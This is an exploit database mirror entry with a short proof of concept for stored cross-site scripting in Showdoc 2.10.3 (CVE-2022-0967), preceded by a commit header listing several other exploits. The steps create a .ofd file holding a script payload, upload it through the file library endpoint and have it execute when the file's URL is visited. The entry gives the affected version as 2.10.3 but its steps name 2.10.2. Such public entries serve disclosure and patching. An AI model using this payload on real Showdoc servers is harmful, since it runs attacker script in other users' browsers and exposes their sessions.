exploit-db-mirror/exploits/php/webapps/50941.txt
Offensive Security cbee98ca48 DB: 2022-05-18
6 changes to exploits/shellcodes

SDT-CW3B1 1.1.0 - OS Command Injection
SolarView Compact 6.0 - OS Command Injection
Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)
T-Soft E-Commerce 4 - SQLi (Authenticated)
Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
2022-05-18 05:01:36 +00:00

21 lines
No EOL
725 B
Text

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967
Description: Stored XSS via uploading file in .ofd format
1. Create a file with .ofd extension and add XSS Payload inside the file
filename = "payload.ofd"
payload = "<script>alert(1)</script>"
2. Login to showdoc v2.10.2 and go to file library
Endpoint = "https://www.site.com/attachment/index"
3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL